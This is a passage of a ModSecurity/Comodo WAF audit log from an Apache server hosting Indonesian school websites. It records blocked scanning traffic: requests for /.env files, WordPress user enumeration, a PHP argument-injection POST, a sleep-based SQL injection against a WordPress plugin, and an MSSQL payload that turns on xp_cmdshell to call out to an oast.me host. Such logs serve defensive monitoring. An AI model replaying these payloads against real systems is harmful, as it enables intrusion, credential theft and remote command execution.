p4=0, p5=99, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --feb0ae61-Z-- --b1930f02-A-- [05/Jun/2025:23:41:19 +0700] aEHIr3-K7ToMdu-YSIJc9wAAAAQ 103.236.140.4 44676 103.236.140.4 8181 --b1930f02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.177 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Opera/6.05 (Windows NT 4.0; U) [de] --b1930f02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1930f02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749141679819645 836 (- - -) Stopwatch2: 1749141679819645 836; combined=314, p1=274, p2=0, p3=0, p4=0, p5=39, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1930f02-Z-- --28f1da75-A-- [05/Jun/2025:23:41:20 +0700] aEHIsH-K7ToMdu-YSIJc-AAAAAs 103.236.140.4 44678 103.236.140.4 8181 --28f1da75-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.177 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/SYB-1103211396; U; es-LA) Presto/2.7.81 Version/11.00 --28f1da75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28f1da75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749141680253917 659 (- - -) Stopwatch2: 1749141680253917 659; combined=246, p1=216, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28f1da75-Z-- --7e9cca06-A-- [05/Jun/2025:23:41:20 +0700] aEHIsH-K7ToMdu-YSIJc-QAAABg 103.236.140.4 44680 103.236.140.4 8181 --7e9cca06-B-- GET /backend/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.177 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 OPR/46.0.2597.39 --7e9cca06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e9cca06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749141680687879 637 (- - -) Stopwatch2: 1749141680687879 637; combined=264, p1=219, p2=0, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e9cca06-Z-- --1e7f1a4b-A-- [05/Jun/2025:23:51:59 +0700] aEHLL3-K7ToMdu-YSIJdAAAAABY 103.236.140.4 44712 103.236.140.4 8181 --1e7f1a4b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.175.77.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.175.77.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1e7f1a4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e7f1a4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749142319201898 2650 (- - -) Stopwatch2: 1749142319201898 2650; combined=1231, p1=431, p2=770, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e7f1a4b-Z-- --ae7b9c2c-A-- [06/Jun/2025:00:16:14 +0700] aEHQ3irHpfaS2Cuwh8UObgAAAFU 103.236.140.4 44924 103.236.140.4 8181 --ae7b9c2c-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 (Edition Campaign 34) Accept-Charset: utf-8 Cookie: X-Forwarded-For: 45.148.10.172 Accept-Encoding: gzip X-Varnish: 173411878 --ae7b9c2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ae7b9c2c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749143774835566 841 (- - -) Stopwatch2: 1749143774835566 841; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae7b9c2c-Z-- --3b5da274-A-- [06/Jun/2025:00:17:12 +0700] aEHRGOth7G2xELALzPZiwwAAAMY 103.236.140.4 44928 103.236.140.4 8181 --3b5da274-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.176.118.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.176.118.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3b5da274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b5da274-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749143832375225 2827 (- - -) Stopwatch2: 1749143832375225 2827; combined=1269, p1=412, p2=827, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b5da274-Z-- --59f19c2e-A-- [06/Jun/2025:00:18:13 +0700] aEHRVeth7G2xELALzPZixQAAANI 103.236.140.4 44938 103.236.140.4 8181 --59f19c2e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.178.94.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.178.94.73 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --59f19c2e-C-- --59f19c2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59f19c2e-E-- --59f19c2e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749143893479599 5076 (- - -) Stopwatch2: 1749143893479599 5076; combined=3237, p1=532, p2=2670, p3=0, p4=0, p5=34, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59f19c2e-Z-- --66a43c51-A-- [06/Jun/2025:00:45:07 +0700] aEHXo-th7G2xELALzPZjAgAAAMI 103.236.140.4 45112 103.236.140.4 8181 --66a43c51-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173411917 --66a43c51-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --66a43c51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66a43c51-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749145507069173 2657 (- - -) Stopwatch2: 1749145507069173 2657; combined=1451, p1=386, p2=1037, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66a43c51-Z-- --87460376-A-- [06/Jun/2025:00:45:08 +0700] aEHXpFwdJdhOudw5hdwEIQAAAJU 103.236.140.4 45116 103.236.140.4 8181 --87460376-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 773 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173235317 --87460376-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0us2vpgpeonc6qdbef06ehtpn3w5xiiy.oast.me'-- --87460376-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --87460376-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749145508033339 3672 (- - -) Stopwatch2: 1749145508033339 3672; combined=2307, p1=476, p2=1760, p3=21, p4=23, p5=26, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87460376-Z-- --9efbdf0b-A-- [06/Jun/2025:00:59:00 +0700] aEHa5Oth7G2xELALzPZjEAAAAMI 103.236.140.4 45640 103.236.140.4 8181 --9efbdf0b-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 194.11.198.108 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: python-requests/2.32.3 Accept: */* Server: nginx/1.26.1 Date: Thu, 05 Jun 2025 17:58:58 GMT Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: SenayanMember=8virv3q8mc9t9cr4djufeusep2; expires=Fri, 06-Jun-2025 05:58:58 GMT; Max-Age=43200; path=/; HttpOnly X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block, 1; mode=block X-Varnish: 173411970, 173235381 Age: 0 Via: 1.1 varnish (Varnish/5.2) X-Cache: HIT from Backend X-Content-Type-Options: nosniff Content-Encoding: gzip Cookie: X-Forwarded-For: 194.11.198.108 Accept-Encoding: gzip --9efbdf0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9efbdf0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749146340527496 944 (- - -) Stopwatch2: 1749146340527496 944; combined=321, p1=289, p2=0, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9efbdf0b-Z-- --eb9f1b0c-A-- [06/Jun/2025:01:14:41 +0700] aEHeketh7G2xELALzPZjJAAAAM4 103.236.140.4 45952 103.236.140.4 8181 --eb9f1b0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --eb9f1b0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb9f1b0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749147281321942 807 (- - -) Stopwatch2: 1749147281321942 807; combined=327, p1=294, p2=0, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb9f1b0c-Z-- --922d4916-A-- [06/Jun/2025:01:14:42 +0700] aEHekuth7G2xELALzPZjJQAAANI 103.236.140.4 45956 103.236.140.4 8181 --922d4916-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --922d4916-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --922d4916-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749147282668021 636 (- - -) Stopwatch2: 1749147282668021 636; combined=253, p1=218, p2=0, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --922d4916-Z-- --7ca71572-A-- [06/Jun/2025:01:31:20 +0700] aEHieH-K7ToMdu-YSIJdKQAAABI 103.236.140.4 46046 103.236.140.4 8181 --7ca71572-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 130.180.196.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 130.180.196.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7ca71572-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ca71572-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749148280386974 2851 (- - -) Stopwatch2: 1749148280386974 2851; combined=1254, p1=443, p2=781, p3=0, p4=0, p5=30, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ca71572-Z-- --8cd7a42b-A-- [06/Jun/2025:02:00:39 +0700] aEHpVyrHpfaS2Cuwh8UOhgAAAEU 103.236.140.4 46190 103.236.140.4 8181 --8cd7a42b-B-- GET //.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 196.251.85.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 196.251.85.234 Accept-Encoding: gzip X-Varnish: 173235477 --8cd7a42b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8cd7a42b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749150039578623 874 (- - -) Stopwatch2: 1749150039578623 874; combined=315, p1=281, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cd7a42b-Z-- --4432b055-A-- [06/Jun/2025:02:03:29 +0700] aEHqAX-K7ToMdu-YSIJdLwAAAAw 103.236.140.4 46208 103.236.140.4 8181 --4432b055-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 Accept-Charset: utf-8 --4432b055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4432b055-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749150209527997 809 (- - -) Stopwatch2: 1749150209527997 809; combined=332, p1=292, p2=0, p3=0, p4=0, p5=40, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4432b055-Z-- --fba53356-A-- [06/Jun/2025:02:04:19 +0700] aEHqM3-K7ToMdu-YSIJdMAAAAAM 103.236.140.4 46210 103.236.140.4 8181 --fba53356-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --fba53356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fba53356-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749150259597613 884 (- - -) Stopwatch2: 1749150259597613 884; combined=324, p1=274, p2=0, p3=0, p4=0, p5=50, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fba53356-Z-- --710b7858-A-- [06/Jun/2025:02:58:32 +0700] aEH26FwdJdhOudw5hdwEaAAAAJQ 103.236.140.4 46486 103.236.140.4 8181 --710b7858-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 81.168.83.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 81.168.83.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --710b7858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --710b7858-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749153512427456 3377 (- - -) Stopwatch2: 1749153512427456 3377; combined=1490, p1=491, p2=966, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --710b7858-Z-- --28a75554-A-- [06/Jun/2025:03:27:24 +0700] aEH9rOth7G2xELALzPZjdAAAANY 103.236.140.4 46698 103.236.140.4 8181 --28a75554-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 